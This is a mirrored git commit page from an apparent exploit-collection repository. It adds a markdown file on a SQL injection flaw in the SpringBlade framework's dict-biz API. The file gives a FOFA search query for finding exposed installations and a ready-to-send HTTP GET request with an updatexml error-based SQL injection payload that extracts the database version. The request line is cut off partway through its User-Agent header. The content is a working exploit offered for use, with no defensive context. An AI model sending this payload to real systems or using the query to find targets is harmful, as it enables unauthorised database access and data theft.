admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create SpringBlade框架dict-biz接口存在sql注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-17 10:22:59 +08:00 committed by GitHub
parent 4620c2b685
commit b245028738
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
SpringBlade框架dict-biz接口存在sql注入漏洞.md Normal file
View File

@ -0,0 +1,14 @@
## SpringBlade框架dict-biz接口存在sql注入漏洞
## fofa
```
body="Saber 将不能正常工作"
```
## poc
```
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
```